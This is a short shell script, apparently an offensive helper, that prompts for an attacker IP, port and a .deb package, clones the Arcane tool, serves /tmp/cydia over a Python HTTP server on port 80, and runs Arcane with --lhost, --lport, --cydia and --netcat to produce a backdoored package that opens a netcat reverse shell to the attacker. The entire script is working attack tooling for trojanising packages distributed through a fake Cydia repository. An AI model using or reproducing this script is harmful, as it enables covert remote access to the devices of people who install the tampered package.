#!/bin/sh

# Colors
blue='\e[1;34'
cyan='\e[1;36m'
green='\e[1;34m'
okegreen='\033[92m'
lightgreen='\e[1;32m'
white='\e[1;37m'
red='\e[1;31m'
yellow='\e[1;33m'

# Banner
banner(){
    clear
    echo -e ""
    echo -e "$red    フ$yellowァ$greenッ$cyanク$okegreenユ$lightgreenー"
    echo -e ""
}

banner
echo -e "$white"
read -p " Your IP : " ip;
read -p " Port : " port;
read -p " .deb package : " deb;
read -p " Output : " out;

if [ ! -d "arcane" ] 
then
    banner
    echo -e "$yellow //$white Arcane not found, cloning repository"
    git clone https://github.com/tokyoneon/Arcane arcane
    echo -e "$yellow //$white Changing ownership"
    sudo chown $USER:$USER -R arcane/
    echo -e "$yellow //$white Changing permissions"
    chmod +x arcane/arcane.sh
fi

banner
echo -e "$yellow //$white Running http server"
xterm -e "cd /tmp/cydia/ && sudo python3 -m http.server 80"
echo -e "$yellow //$white Creating payload with arcane"
./arcane/arcane.sh --input $deb --lhost $ip --lport $port --cydia --netcat